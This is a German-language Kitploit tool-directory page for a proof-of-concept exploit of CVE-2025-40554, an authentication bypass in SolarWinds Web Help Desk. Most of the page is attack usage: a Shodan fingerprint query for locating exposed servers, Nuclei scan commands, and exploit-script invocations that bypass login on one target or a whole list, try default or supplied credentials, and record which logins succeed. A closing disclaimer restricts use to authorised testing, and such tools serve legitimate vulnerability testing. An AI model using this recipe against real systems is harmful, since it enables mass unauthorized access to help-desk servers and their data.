Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/imbas007/auth-bypass-cve-2025-40554
Authentifizierung & AutorisierungSchwachstellenscannerExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubimbas007/auth-bypass-cve-2025-40554

auth-bypass-CVE-2025-40554

Proof-of-concept-Exploit für CVE-2025-40554, eine Authentifizierungsumgehung in SolarWinds Web Help Desk. Enthält Nuclei-Vorlage und Python-Exploit für Einzel- oder Batch-Zieltest mit optionalem Anmeldedaten-Login.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
14vor 7 MonatenNoch nicht geprüft

CVE-2025-40554 – SolarWinds Web Help Desk Auth Bypass PoC

shodan Abfrage

root@kitploit:~
http.favicon.hash:"1895809524"

Nuclei

root@kitploit:~
nuclei -u https://TARGET:8443 -t CVE-2025-40554.yaml
nuclei -l list_target.txt -t CVE-2025-40554.yaml
root@kitploit:~
pip install -r requirements.txt

Verwendung

Einzelnes Ziel (Bypass + Login, Standard client/client):

root@kitploit:~
python3 exploit_auth_bypass.py -t https://TARGET:8443
Bild

Einzelnes Ziel mit benutzerdefinierten Anmeldedaten:

root@kitploit:~
python3 exploit_auth_bypass.py -t https://TARGET:8443 -u myuser -p mypass

Einzelnes Ziel, nur Bypass (kein Login):

root@kitploit:~
python3 exploit_auth_bypass.py -t https://TARGET:8443 --no-login

Zielliste (speichert nur verwundbare + Login):

root@kitploit:~
python3 exploit_auth_bypass.py -l result_all.txt
python3 exploit_auth_bypass.py -l targets.txt -o my_login_ok.txt

Zielliste mit benutzerdefinierten Anmeldedaten:

root@kitploit:~
python3 exploit_auth_bypass.py -l targets.txt -u admin -p secret

Quiet-Modus (nur URLs ausgeben, bei denen Login erfolgreich):

root@kitploit:~
python3 exploit_auth_bypass.py -l result_all.txt -q

Haftungsausschluss

Dieses PoC dient nur autorisierten Sicherheitsforschungs- und Testzwecken. Nicht autorisierter Zugriff auf Computersysteme ist illegal. Die Autoren übernehmen keine Verantwortung für Missbrauch.

Tool herunterladen